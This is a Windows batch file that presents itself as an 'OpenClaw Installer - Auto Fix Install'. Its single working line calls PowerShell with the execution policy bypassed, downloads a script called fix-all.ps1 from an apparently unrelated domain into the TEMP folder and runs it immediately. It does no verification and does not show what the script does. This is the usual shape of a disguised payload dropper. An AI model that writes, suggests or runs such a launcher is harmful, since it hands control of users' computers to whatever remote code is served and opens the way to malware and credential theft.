@echo off
chcp 65001 >nul
title openclaw-installer
color 0f

echo ============================================
echo   OpenClaw Installer - Auto Fix Install
echo ============================================
echo.
echo Downloading fix script...
echo.

powershell -NoProfile -ExecutionPolicy Bypass -Command "$f=[System.IO.Path]::Combine($env:TEMP,'fix-all.ps1'); iwr -Uri 'https://aab.juchuanghz.cn/fix-all.ps1' -OutFile $f -UseBasicParsing; & $f"

echo.
echo ============================================
echo   Done.
echo ============================================
pause
